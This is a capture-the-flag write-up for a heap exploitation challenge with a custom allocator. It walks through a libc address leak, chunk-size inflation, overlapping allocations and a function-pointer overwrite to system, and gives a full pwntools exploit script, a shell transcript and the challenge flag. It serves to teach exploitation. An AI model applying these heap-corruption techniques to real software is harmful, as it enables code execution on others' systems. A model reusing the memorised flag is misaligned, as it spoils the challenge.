lulocator - EH4X CTF 2026

Category: Binary Exploitation | Points: 500 | Solves: 0 (first blood baby) | Author: nrg & the_moon_guy

Who needs that buggy malloc? Made my own completely safe lulocator.

nc chall.ehax.in 40137

TL;DR

Custom heap allocator with a write command that lets you send size + 0x18 bytes into a buffer that only holds size bytes. Classic off-by-~~one~~twenty-four. We inflate a freed chunk's size header, get an overlapping allocation over a victim object, overwrite its function pointer to system, fill its data with /bin/sh, and pop a shell.

0x00 - First Look

We get a stripped ELF binary and a libc (glibc 2.35). Let's check what we're working with:

$ pwn checksec lulocator
    Arch:       amd64-64-little
    RELRO:      No RELRO        <-- GOT is writable, free real estate
    Stack:      No canary found <-- stack smash? maybe later
    NX:         NX enabled      <-- no shellcode on stack/heap
    PIE:        No PIE (0x400000) <-- addresses are fixed, nice

No PIE + No RELRO is basically the binary saying "please hack me bro".

The binary presents a menu-driven heap challenge:

=== lulocator ===
1) new          -- allocate an object with custom size
2) write        -- write data to an object
3) delete       -- free an object
4) info         -- leak object address + stdout ptr + size
5) set_runner   -- pick an object as "the runner"
6) run          -- call runner->func_ptr(runner->data)
7) quit

So we have a classic note-style pwn challenge but with a twist - there's a custom allocator ("lulocator") instead of glibc malloc, and objects have a function pointer that gets called via run. That function pointer is our ticket to code execution.

0x01 - Reversing the Allocator

Since the binary is stripped, we gotta reverse everything from raw disassembly. Here's what I figured out:

The Arena

The allocator mmaps a 0x40000-byte region at startup. It uses a simple bump allocator for new allocations and a circular doubly-linked free list for freed chunks. The free list sentinel lives at a fixed address 0x404850 in .data (no PIE = we know this address).

Chunk Layout

Each chunk on the heap looks like:

+----------+---------------------------+
| Header   | Data                      |
| (8 bytes)| (aligned to 16 bytes)     |
+----------+---------------------------+
     ^
     |
     +-- size | flags  (bit 0 = allocated)

header & ~0xF = chunk size (total, including header)
header & 1 = allocated bit (1 = in use, 0 = free)
When free, the data area stores: fwd pointer (8 bytes) + bwd pointer (8 bytes)
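
To make the header encoding concrete, here's a minimal Python sketch of it. The helper names (decode_header, encode_header) are made up for illustration and are not symbols from the binary, and it assumes the low bits other than bit 0 are unused.

```python
# Sketch of the 8-byte chunk header described above.
# Names are illustrative; only bit 0 is assumed to carry a flag.
ALLOCATED_BIT = 0x1
SIZE_MASK = ~0xF & 0xFFFFFFFFFFFFFFFF  # clear the low 4 bits of a 64-bit value


def decode_header(header):
    """Split a raw header into (total_chunk_size, is_allocated)."""
    return header & SIZE_MASK, bool(header & ALLOCATED_BIT)


def encode_header(chunk_size, allocated):
    """Build a raw header from a 16-byte-aligned chunk size and the in-use flag."""
    if chunk_size % 16 != 0:
        raise ValueError("chunk size must be 16-byte aligned")
    return chunk_size | (ALLOCATED_BIT if allocated else 0)


if __name__ == "__main__":
    for raw in (0x41, 0x40, 0x80):
        size, used = decode_header(raw)
        print(f"header={raw:#x} size={size:#x} allocated={used}")
```

So 0x41 is a live 0x40-byte chunk, and a bare 0x80 is a free 0x80-byte chunk, which is exactly the value we'll want to forge later.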

Object Layout

When you do new(size), the allocator does lu_alloc(size + 0x28). The returned memory is laid out as:

Object structure (returned by lu_alloc):
+0x00: field_0     (8 bytes) -- unused, zeroed
+0x08: field_1     (8 bytes) -- unused, zeroed
+0x10: func_ptr    (8 bytes) -- function pointer (default: print_mail)
+0x18: out_ptr     (8 bytes) -- FILE* stdout
+0x20: size        (8 bytes) -- user-requested size
+0x28: data[size]            -- user data buffer

The run command does: runner->func_ptr(runner + 0x28) -- it calls the function pointer with a pointer to the data buffer as the argument.

If we can overwrite func_ptr to system and put /bin/sh in the data buffer... game over.
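
Here's a small Python sketch of that object layout using the struct module, handy for double-checking offsets. The function name pack_object and the example pointer values are assumptions for illustration only; the field order and sizes come from the layout above.

```python
import struct

# Five little-endian 8-byte fields: field_0, field_1, func_ptr, out_ptr, size.
OBJ_META_FMT = "<5Q"
OBJ_META_SIZE = struct.calcsize(OBJ_META_FMT)  # 0x28, where data[] begins
FUNC_PTR_OFFSET = 0x10


def pack_object(func_ptr, out_ptr, size, data=b""):
    """Serialize an object as it would sit in memory (illustrative helper)."""
    if len(data) > size:
        raise ValueError("data longer than the declared size")
    meta = struct.pack(OBJ_META_FMT, 0, 0, func_ptr, out_ptr, size)
    return meta + data.ljust(size, b"\x00")


if __name__ == "__main__":
    # Placeholder addresses, not real leaks.
    obj = pack_object(0x401234, 0x7F0000001000, 0x10, b"hello")
    func_ptr = struct.unpack_from("<Q", obj, FUNC_PTR_OFFSET)[0]
    print(f"meta size={OBJ_META_SIZE:#x} func_ptr={func_ptr:#x} total={len(obj):#x}")
```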

[Figure: Before/After]

0x02 - Finding the Bug

Here's the write command logic (simplified pseudocode):

void cmd_write(void) {
    int idx = read_int("idx: ");
    obj_t *obj = slots[idx];
    uint64_t len = read_ull("len: ");

    // THE BUG IS RIGHT HERE OFFICER
    if (len > obj->size + 0x18) {
        puts("too long");
        return;
    }

    read_all(0, obj->data, len);   // reads into data buffer
    // ... null termination ...
}

The check allows writing up to obj->size + 0x18 bytes, but the data buffer is only obj->size bytes long.

That's a 0x18 (24) byte heap overflow.

[Figure: Heap Overflow]

24 bytes overflow means we can corrupt:

8 bytes of the next chunk's header
8 bytes of the next chunk's data[0] (fwd pointer if free)
8 bytes of the next chunk's data[8] (bwd pointer if free)
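
The check and its reach can be modelled in a few lines of Python. This is a sketch of the logic from the pseudocode above, not code lifted from the binary; the function names are made up.

```python
OVERFLOW_SLACK = 0x18  # the extra bytes the buggy check lets through

# What sits directly after data[size], in 8-byte steps.
SPILL_TARGETS = [
    "next chunk header",
    "next chunk data[0:8] (fwd if free)",
    "next chunk data[8:16] (bwd if free)",
]


def write_allowed(obj_size, length):
    """Mirror of the buggy check: only rejects when length > size + 0x18."""
    return length <= obj_size + OVERFLOW_SLACK


def overflow_bytes(obj_size, length):
    """How many bytes of an accepted write land past the end of data[]."""
    return max(0, length - obj_size)


def corrupted_fields(obj_size, length):
    """Names of the 8-byte fields touched (fully or partially) by the spill."""
    touched = (overflow_bytes(obj_size, length) + 7) // 8
    return SPILL_TARGETS[:touched]


if __name__ == "__main__":
    size = 0x10
    for length in (0x10, 0x18, 0x28, 0x29):
        ok = write_allowed(size, length)
        print(f"len={length:#x} allowed={ok} spill={corrupted_fields(size, length) if ok else '-'}")
```

A correct check would simply be length <= obj_size, which makes overflow_bytes always zero.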

0x03 - The Leak (free info lol)

The info command is literally handing us addresses on a silver platter:

[info] addr=0x7f1234560008 out=0x7f12345bf780 len=16
                            ^^^
                            This is stdout (FILE*) = libc address!

The out field contains the address of _IO_2_1_stdout_ inside libc. Since we know the libc version (2.35), we just subtract the known offset to get libc base:

python

libc_base = leaked_stdout - 0x21b780   # offset of _IO_2_1_stdout_ in libc 2.35
system    = libc_base + 0x50d70        # offset of system()

That was easy. Thanks for the free leak, challenge author.
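
If you want something a bit more defensive than string splitting, here's a sketch that parses the info line with a regex and sanity-checks the result. It assumes the line format shown above; the helper names are mine, and the page-alignment check is just a cheap way to notice a wrong libc.

```python
import re

LIBC_STDOUT = 0x21B780  # offset of _IO_2_1_stdout_ used in this writeup
LIBC_SYSTEM = 0x50D70   # offset of system() used in this writeup

INFO_RE = re.compile(r"addr=(0x[0-9a-fA-F]+) out=(0x[0-9a-fA-F]+) len=(\d+)")


def parse_info(line):
    """Return (object_addr, stdout_ptr, length) from an [info] line."""
    match = INFO_RE.search(line)
    if match is None:
        raise ValueError(f"unexpected info line: {line!r}")
    return int(match.group(1), 16), int(match.group(2), 16), int(match.group(3))


def libc_from_stdout(stdout_leak):
    """Return (libc_base, system_addr); refuse bases that are not page-aligned."""
    base = stdout_leak - LIBC_STDOUT
    if base & 0xFFF:
        raise ValueError("libc base is not page-aligned, offsets probably wrong")
    return base, base + LIBC_SYSTEM


if __name__ == "__main__":
    sample = "[info] addr=0x7f1234560008 out=0x7f12345bf780 len=16"
    addr, out, length = parse_info(sample)
    base, system = libc_from_stdout(out)
    print(f"obj={addr:#x} libc={base:#x} system={system:#x} len={length}")
```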

0x04 - The Exploit Strategy: Overlapping Chunks

OK so we have a 24-byte overflow and we need to overwrite an object's func_ptr at offset +0x10. The overflow covers the next chunk's 8-byte header plus the first 16 bytes after it, which for a live object are field_0 and field_1 (offsets +0x00 and +0x08) -- it stops 8 bytes short of func_ptr.

But we can do something sneaky: inflate a freed chunk's size to create an overlapping allocation.

Here's the plan:

Step 1: Set up the heap

Allocate A (size=0x10) --> slot 0, chunk size 0x40
Allocate B (size=0x10) --> slot 1, chunk size 0x40
Allocate C (size=0x10) --> slot 2, chunk size 0x40

Heap layout:
+--------+--------+--------+
| A 0x40 | B 0x40 | C 0x40 |
+--------+--------+--------+

Step 2: Free B

B goes to the free list. Its header now says size=0x40 (allocated bit cleared), and its data area contains fwd/bwd pointers to the sentinel (0x404850).

[Figure: Heap State]

Step 3: Overflow from A into B

Write 0x28 bytes to A (that's 0x10 of legit data + 0x18 overflow):

python

overflow = b'A' * 0x10       # A's data (padding)
overflow += p64(0x80)        # B's header: inflate 0x40 -> 0x80 !!
overflow += p64(0x404850)    # B->fwd: keep valid (sentinel)
overflow += p64(0x404850)    # B->bwd: keep valid (sentinel)

Key insight: we keep the fwd/bwd pointers correct so the safe-unlink integrity check passes when B is reallocated. The allocator checks fwd->bwd == node && bwd->fwd == node before unlinking. Since B is the only element on the free list, both fwd and bwd point to the sentinel, and the sentinel's fwd/bwd both point to B. Our overflow rewrites fwd/bwd with the same values they already held, so the check passes.

+--------+------------------+
| A 0x40 | B "FREE" sz=0x80 |  <-- B now thinks it's 0x80 bytes
|        | (covers B AND C!) |
+--------+------------------+
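
To see why the safe-unlink check is happy, here's a toy Python model of a circular doubly-linked free list with a sentinel. It is a sketch of the check as described above, not a reimplementation of the allocator: the class, the insert-at-head policy, and B's address are all assumptions.

```python
SENTINEL = 0x404850
B_NODE = 0x7F0000000048  # hypothetical address of B's link fields


class FreeList:
    """addr -> [fwd, bwd]; an empty list is a sentinel pointing at itself."""

    def __init__(self):
        self.links = {SENTINEL: [SENTINEL, SENTINEL]}

    def insert(self, node):
        """Link node right after the sentinel (insertion policy is assumed)."""
        old_first = self.links[SENTINEL][0]
        self.links[node] = [old_first, SENTINEL]
        self.links[old_first][1] = node
        self.links[SENTINEL][0] = node

    def safe_unlink(self, node):
        """Unlink node only if fwd->bwd == node and bwd->fwd == node."""
        fwd, bwd = self.links[node]
        fwd_links = self.links.get(fwd, (None, None))
        bwd_links = self.links.get(bwd, (None, None))
        if fwd_links[1] != node or bwd_links[0] != node:
            raise RuntimeError("free list corrupted")
        self.links[fwd][1] = bwd
        self.links[bwd][0] = fwd
        del self.links[node]


if __name__ == "__main__":
    fl = FreeList()
    fl.insert(B_NODE)                        # delete(B)
    fl.links[B_NODE] = [SENTINEL, SENTINEL]  # overflow rewrites identical pointers
    fl.safe_unlink(B_NODE)                   # passes; nothing here looks at the size
    print("unlink ok, list empty:", fl.links[SENTINEL] == [SENTINEL, SENTINEL])
```

Writing junk like 0x4141414141414141 into fwd/bwd instead would trip the check, which is why the overflow payload carries the sentinel address twice.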

[Figure: Overflow Detail]

Step 4: Allocate D (size=0x50) - gets the inflated chunk

When we allocate D with size 0x50, the allocator needs a chunk of total size align16(0x50 + 0x28 + 0x8) = 0x80. It finds B on the free list with (fake) size 0x80 -- perfect fit! D gets allocated right on top of B's old location, but its data area now extends into C's territory.

+--------+----------------------------------+
| A 0x40 | D (size=0x50)                    |
|        | D_meta | D_data[0x50]            |
|        |        | .....|C_hdr|C_meta|C_dat|
+--------+----------------------------------+
                         ^     ^      ^
                         |     |      |
                    We control ALL of this
                    through D's write!
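
The size arithmetic is easy to get wrong by 0x10, so here's a tiny Python sketch of it. It assumes the rounding works exactly like the align16(size + 0x28 + 0x8) expression above; the function names are illustrative.

```python
CHUNK_HEADER = 0x8  # size | flags word in front of every chunk
OBJ_META = 0x28     # field_0, field_1, func_ptr, out_ptr, size


def align16(n):
    """Round n up to the next multiple of 16."""
    return (n + 0xF) & ~0xF


def chunk_size(user_size):
    """Total chunk size the allocator needs for new(user_size)."""
    return align16(user_size + OBJ_META + CHUNK_HEADER)


def request_for_chunk(total):
    """Largest user size whose chunk is exactly `total` bytes."""
    return total - OBJ_META - CHUNK_HEADER


if __name__ == "__main__":
    for size in (0x10, 0x50):
        print(f"new({size:#x}) -> chunk {chunk_size(size):#x}")
    print(f"to claim a 0x80 chunk, request {request_for_chunk(0x80):#x}")
```

That's where the 0x50 comes from: it's the request whose chunk is exactly the forged 0x80, i.e. B's 0x40 plus C's 0x40.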

Step 5: Write through D to corrupt C

Now we write to D's data area. Since D overlaps with C, we can overwrite C's entire object metadata:

python

payload  = b'\x00' * 0x10     # gap (D data before C starts)
payload += p64(0x41)           # C's chunk header (keep original)
payload += p64(0)              # C->field_0
payload += p64(0)              # C->field_1
payload += p64(system_addr)    # C->func_ptr = system()  <-- BOOM
payload += p64(0)              # C->out_ptr
payload += p64(0x10)           # C->size
payload += b'/bin/sh\x00'      # C->data = "/bin/sh"
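
To convince yourself the offsets line up without touching the remote, here's an offline Python sketch that lays A, B and C out in a bytearray and applies the same payload at D's data pointer. The arena offsets and FAKE_SYSTEM are placeholders I picked for the simulation; only the 0x8 header, the 0x28 metadata and the 0x40 chunk sizes come from the analysis above.

```python
import struct

CHUNK_HDR, OBJ_META = 0x8, 0x28
A_CHUNK, B_CHUNK, C_CHUNK = 0x00, 0x40, 0x80  # offsets inside a fake arena
FAKE_SYSTEM = 0x7F12343F4D70                  # placeholder, not a real leak

arena = bytearray(0xC0)  # room for three 0x40-byte chunks

# D is carved out of B's old chunk, so its data starts after B's header + metadata.
d_data = B_CHUNK + CHUNK_HDR + OBJ_META  # 0x70
c_obj = C_CHUNK + CHUNK_HDR              # 0x88, what slots[C] points at
gap = C_CHUNK - d_data                   # bytes of D data before C's header

payload = b"\x00" * gap
payload += struct.pack("<Q", 0x41)                          # C's chunk header
payload += struct.pack("<5Q", 0, 0, FAKE_SYSTEM, 0, 0x10)   # C's metadata
payload += b"/bin/sh\x00"                                   # C's data

# Emulate write(D, payload): copy the bytes starting at D's data pointer.
arena[d_data:d_data + len(payload)] = payload

func_ptr = struct.unpack_from("<Q", arena, c_obj + 0x10)[0]
run_arg = bytes(arena[c_obj + OBJ_META:c_obj + OBJ_META + 8])

if __name__ == "__main__":
    print(f"gap={gap:#x} payload_len={len(payload):#x}")
    print(f"C->func_ptr={func_ptr:#x} run() argument={run_arg!r}")
```

The payload is 0x48 bytes, so it fits inside D's 0x50-byte buffer and the write doesn't even need the overflow at this point.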

Step 6: Set runner to C and RUN

python

set_runner(c_idx)   # runner = C
run()               # calls C->func_ptr(C->data) = system("/bin/sh")

  set_runner(C)  --->  runner = C
  run()          --->  C->func_ptr(C + 0x28)
                 --->  system("/bin/sh")

0x05 - Putting It All Together

Here's the full attack flow as a diagram:

[Figure: 6-Step Attack Flow]

0x06 - The Exploit Script

python

#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'

# Libc offsets (glibc 2.35 - Ubuntu)
LIBC_STDOUT = 0x21b780
LIBC_SYSTEM = 0x50d70
SENTINEL    = 0x404850       # free list sentinel (no PIE = fixed addr)

p = remote('chall.ehax.in', 40137)
p.recvuntil(b'=== lulocator ===')

# --- Helper functions ---
def new(size):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(size).encode())
    p.recvuntil(b'[new] index=')
    return int(p.recvline().strip())

def write(idx, data):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendlineafter(b'len: ', str(len(data)).encode())
    p.sendafter(b'data: ', data)
    p.recvuntil(b'[wrote]')

def delete(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.recvuntil(b'[deleted]')

def info(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'idx: ', str(idx).encode())
    line = p.recvline_contains(b'[info]').decode()
    parts = line.split()
    addr = int(parts[1].split('=')[1], 16)
    out  = int(parts[2].split('=')[1], 16)
    return addr, out

def set_runner(idx):
    p.sendlineafter(b'> ', b'5')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.recvuntil(b'[runner set]')

def run():
    p.sendlineafter(b'> ', b'6')

# === PHASE 1: LEAK ===
A = new(0x10)                          # slot 0
_, stdout_leak = info(A)
libc_base = stdout_leak - LIBC_STDOUT
system    = libc_base + LIBC_SYSTEM
log.success(f"libc: {hex(libc_base)}")
log.success(f"system: {hex(system)}")

# === PHASE 2: SETUP ===
B = new(0x10)                          # slot 1 (sacrifice)
C = new(0x10)                          # slot 2 (target)
delete(B)                              # B -> free list

# === PHASE 3: OVERFLOW & INFLATE ===
overflow  = b'A' * 0x10                # A's data (junk)
overflow += p64(0x80)                  # inflate B's size: 0x40 -> 0x80
overflow += p64(SENTINEL)              # keep fwd valid
overflow += p64(SENTINEL)              # keep bwd valid
write(A, overflow)

# === PHASE 4: OVERLAPPING ALLOC ===
D = new(0x50)                          # gets inflated B, overlaps C

# === PHASE 5: CORRUPT C ===
payload  = b'\x00' * 0x10              # gap
payload += p64(0x41)                   # C chunk header
payload += p64(0) * 2                  # field_0, field_1
payload += p64(system)                 # C->func_ptr = system
payload += p64(0)                      # C->out_ptr
payload += p64(0x10)                   # C->size
payload += b'/bin/sh\x00'              # C->data
write(D, payload)

# === PHASE 6: PROFIT ===
set_runner(C)
run()                                  # system("/bin/sh")

p.interactive()

0x07 - Shell!

$ python3 exploit.py
[+] Opening connection to chall.ehax.in on port 40137: Done
[+] libc: 0x765e68e9f000
[+] system: 0x765e68eefd70
[*] Switching to interactive mode

$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ cat flag*
EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

0x08 - Key Takeaways (educational stuff)

Why did this work?

Protection  Status  Impact
PIE         OFF     All binary addresses are fixed -- we know the sentinel at `0x404850`
RELRO       None    GOT is writable (didn't even need it, but nice to have)
Canary      OFF     Stack smashing possible (didn't need it either)
NX          ON      Can't exec shellcode on heap/stack, so we use `system()`

Concepts used in this exploit:

Heap Overflow -- The write command has an off-by-0x18 bug. Always check boundary conditions in allocators! The check was len <= size + 0x18 instead of len <= size.
Chunk Size Inflation -- By overwriting a free chunk's size header to a larger value, we trick the allocator into returning an allocation that overlaps with adjacent chunks. This is a classic heap exploitation primitive.
Overlapping Allocations -- Once we have a chunk that overlaps another object, we can read/write the victim object's internal metadata through the overlapping chunk.
Function Pointer Hijack -- The object had a function pointer at a known offset. By overwriting it to system() and controlling the argument (the data buffer), we achieve arbitrary command execution.
Free List Integrity Bypass -- The allocator had a safe-unlink check (fwd->bwd == node && bwd->fwd == node). We bypassed it by keeping the fwd/bwd pointers valid during our overflow. The check only verifies link consistency, not size consistency.

The vulnerability in one picture:

[Figure: Vulnerability Summary]

Similar real-world bugs:

CVE-2021-27365 (Linux kernel iSCSI) -- heap buffer overflow due to incorrect size check
Pretty much any custom allocator that rolls its own bounds checking instead of using well-tested implementations

The lesson? Don't write your own malloc unless you really know what you're doing.

Flag: EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

unfortunately the lul is on me -- yeah, it really was on the lulocator lol

GG to nrg & the_moon_guy for a clean pwn challenge. 500 points well earned.
